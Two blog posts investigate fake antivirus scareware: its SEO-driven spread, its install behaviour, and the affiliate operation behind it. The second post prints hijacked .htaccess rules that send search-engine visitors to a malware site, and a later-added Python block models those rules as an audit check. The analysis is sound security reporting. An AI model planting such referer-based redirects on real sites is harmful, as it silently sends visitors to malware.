The Anti-Virus Virus Part II


In The Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SEO’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware (a variety of bogus anti-virus applications) is downloaded when you click on a link in a page returned by a search engine. The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to redirect visitors to the rogue downloads.

This exploit is interesting because in order for it to work, it requires the user to visit the site indirectly. If you navigate to the site via a bookmark or manually enter the address, no redirect takes place. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that something is wrong with his site, and thus delays its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines (which forms the majority of visits) will keep getting redirected to the malware download.

The underlying technique of such an attack is a modification of the .htaccess file (the per-directory configuration file used by the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users whose HTTP Referer header shows they arrived from Google, Yahoo or MSN to “malewaresite”; a request with no such Referer (a direct visit) is served normally. In some cases, common error pages are also redirected by the .htaccess file, as in the following:

ErrorDocument 404 http://malewaresite-omitted/

The result of this re-route is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these cracks is poor user access control, which results in overly permissive file and folder permissions on shared hosting servers. This allows a compromised account on the same physical server to overwrite the .htaccess files of otherwise unrelated sites.
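As an added example (not code from the original post), the following Python models the referer-conditional redirect described above and doubles as an audit check for a site owner: it parses the RewriteCond, RewriteRule and ErrorDocument lines, evaluates them against a request (a dict carrying HTTP_REFERER and REQUEST_URI, a simplification of Apache’s own evaluation), and lists every redirect target whose host is not the site itself. The sample .htaccess and all hostnames are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the rules quoted above; the target host is a placeholder.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteRule .* http://malwaresite-omitted.example/ [R=301,L]
ErrorDocument 404 http://malwaresite-omitted.example/
"""

def parse_htaccess(text):
    """Return ([(conditions, uri_pattern, target)], [(code, url)]) from the directives we care about."""
    rules, errordocs, conds = [], [], []
    for parts in (ln.split() for ln in text.splitlines()):
        if len(parts) < 3: continue
        flags = parts[3] if len(parts) > 3 else ""
        if parts[0] == "RewriteCond":       # (variable, regex, case-insensitive?, OR-chained?)
            conds.append((parts[1].strip("%{}"), parts[2], "NC" in flags, "OR" in flags))
        elif parts[0] == "RewriteRule":     # the conditions collected so far belong to this rule
            rules.append((conds, parts[1], parts[2]))
            conds = []
        elif parts[0] == "ErrorDocument" and parts[2].startswith("http"):
            errordocs.append((parts[1], parts[2]))
    return rules, errordocs

def conditions_hold(conds, request):
    """Apache semantics: [OR] chains a condition with the next one; the chains are ANDed together."""
    i = 0
    while i < len(conds):
        group = [conds[i]]
        while group[-1][3] and i + 1 < len(conds):
            i += 1
            group.append(conds[i])
        if not any(re.search(c[1], request.get(c[0], ""), re.I if c[2] else 0) for c in group):
            return False
        i += 1
    return True

def redirect_target(rules, request):  # None means the visitor sees the real page
    for conds, pattern, target in rules:
        if re.search(pattern, request.get("REQUEST_URI", "")) and conditions_hold(conds, request):
            return target
    return None

def external_targets(rules, errordocs, site_host):
    # Audit check: any redirect or error-page target on a host other than the site itself.
    return sorted({t for t in [r[2] for r in rules] + [e[1] for e in errordocs]
                   if urlparse(t).hostname not in (None, site_host)})
```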

Source and Authorship
I loaded Process Monitor and installed the copy of Antivirus 2010 on a quarantined Microsoft Virtual PC running Microsoft XP Professional. The installation created an entire registry hive that included several autoruns, browser search redirects, and a rootkit. I then fired up TCPView and examined the application’s outgoing communication. It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia (Moscow and Kiev). The domains associated with the servers were registered by which is currently hosted in Canada.

Interestingly, upon startup the malware called the GetKeyboardLayout API and checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania

If it found one, it terminated itself, further proof that the designers targeted English-speaking users. The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

Marketing and Distribution
For software to be commercially viable, it must have effective marketing and distribution channels. The bogus antivirus is no exception. It turns out that even a few US companies have been associated with the distribution of this software. Several of them have been named as defendants in the Federal Trade Commission’s complaint. Some of these include Innovative Marketing, Inc., a US company registered in Belize, and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributors including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

The Federal Trade Commission argued that the defendants used complex online advertising techniques that violate fair trade law in order to push a large number of fake security or system maintenance products, including “WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and, LLC.

In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called “Scareware” applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads. According to court records, as of February 11, 2009, Jain is officially listed as a fugitive from justice in the United States.

Affiliate Program

The affiliate program is made up of a network of associates. Once a member the likes of Sam Jain is accepted into the program, he is given access to an enterprise control panel that lets him distribute different flavors of malware as well as a number of techniques for infecting internet-connected computers. Affiliates can make between 58 and 90 percent commission on sales of the software. Such generous commissions explain why these types of malware products are so popular among spammers.

Image 1: Bakasoftware Malware Administrative Download Control Panel

In a true testament to their feature richness, the affiliate members have access to a sophisticated web-based statistics dashboard. In it, the franchise owner can view KPIs that include: number of daily installs, number of purchases per victim (along with the victim’s credit card number), refunds (chargebacks), and commissions. With such access to real-time sales analytics, they can be the envy of many Fortune 500 sales organizations.

Table 1: Bakasoftware Malware Sales Dashboard

As you can see from Table 1, one affiliate installed 154,825 copies of the software in 10 days and managed to get 2,772 of those victims to buy the “cure”. Any commission sales rep will tell you that a 2% conversion rate is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A projection of this earning rate would generate over 5.5 million dollars a year.

That’s some pocket change. Who says that crime doesn’t pay?

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

The Anti-Virus Virus


Several weeks ago, my wife was searching online for the words to one of Shel Silverstein’s poems.  With the Internet within closer reach than the bookshelf in our den, she went to Google and typed in the key words “shel silverstein pancakes,”  and within 0.32 seconds got several matching results (Image 1).


Image 1: Google Search Results

She clicked on one of the top results on the first search page and almost instantly got prompted by a message box (Image 2) indicating something to the effect that her computer contained various signs of viruses and immediately needed to be examined.  It then offered an option to perform a security scan.


Image 2: Infection Warning

We keep our OS well patched and our anti-malware software up to date, so she decided to decline the offer and clicked on the Cancel button. The message box went away, but then another screen popped up telling her that her system was being scanned for viruses. Thinking that she might have clicked the OK button by mistake, she waited for the scan results.


Image 3: Infection Warning

When the scan was complete (within 15 seconds or so), she was informed that her computer indeed had been infected with several nasty viruses (Image 3) and that she would need to download and install the offered security program in order to remove these viruses (Image 4).


Image 4: Malware Download Dialog Box

At that point, she realized that the malware itself was communicating with her and trying to install itself on her machine. She clicked the Cancel button on the dialog box, but instead of terminating the installation, she was taken back to the first message box, which told her again that her computer contained various signs of viruses and needed to be examined. Essentially, she was trapped in a loop, unable to close the browser. After another round of scans and cancellations, she decided to bring up the Task Manager and terminate the process from there.

Several days later during dinner, she happened to mention her run-in with the malware and I made a sly comment that these are the rewards we reap for hanging around dubious websites.  She took offense. “Dubious web sites?” she said, mocking me, “this was the fourth entry on the first search results page of Google. How ‘dubious’ can that be?”

I found it hard to believe that the writers of the malware were clever enough to sneak past the Google filters and make it to the top of the first search results page. I executed the same search she had done just a day earlier. My search results were almost identical, but ironically her malware link had by then moved a step upwards in relevance.

Instead of clicking on the link, I copied its URL and went directly to the website (Image 5).


Image 5: Actual page with download link and keywords

The web site turned out to be a newsgroup called, which is one of the most popular and most heavily advertised mailing list archives on the net. Looking closer at the page, I found the following:

  1. At the top was the bold title “SHEL SILVERSTEIN”
  2. Below the title was a bogus poster name in the format of
  3. Next was a link which activated the malware download script.
  4. Finally at the bottom of the page was an extensive list of hundreds of keywords that were associated with the works of Shel Silverstein.

I looked at the parent directory page and found a long list of dated directories (Image 6).


Image 6: Parent Directory (note heavy commercial advertising)

Each one of these directories contained dozens of linked entries. After randomly clicking on about 30 links, I determined that most of them were identical to the Shel Silverstein page (Image 5) in terms of content, layout and malware activation functionality.  I checked out several other public newsgroups and “personal” web sites to compare. It appeared as if indeed there was a method to this madness.

Image 6: Sample directory contents with links to malware download

So what does it all mean? Well, the modus operandi seems to be as follows:

  1. The creators of the malware install the program on a large number of personal websites (some have been breached and others are dedicated). One example is Rosuto Samurai which was allegedly created to support fantasy gaming but in reality never had any content beside the malware.
  2. They then proceed to automatically create hundreds of highly popular topic pages (i.e. iPod, Shel Silverstein, movies, etc.) in newsgroups and mailing lists, each of which contains a link to the malware download website.
  3. Each of the pages also includes a large list of keywords (generated by some machine learning process) that are associated with the topic.  The purpose of the keyword list is to increase the radar signature for the search engine spiders.
  4. The search engines find these individual topic pages, traverse the keyword list and algorithmically determine that all the words are related.  They also see the hyperlinks and postings on each page (which makes them appear like miniature websites) and as a result assign them a top rating—which to the user, translates as top hits in topic search results.

The outcome of this strategy is cheap and effective SEO penetration and viral dissemination of viral contents (no pun intended) via top search results.

Another interesting observation—which is not without its irony—is that large vendors such as Microsoft are completely unaware of this practice and are aggressively purchasing advertising space on these sites, (including ads for their security products).  Clearly, this is being done without the realization that they are actually sharing living space with some of the most aggressive malware distribution centers.

Stay tuned: in a future posting, we will dive deeper to see who is actually developing and marketing this malware.

Quis Custodiet Ipsos Custodes?


© Copyright 2010 Yaacov Apelbaum All Rights Reserved.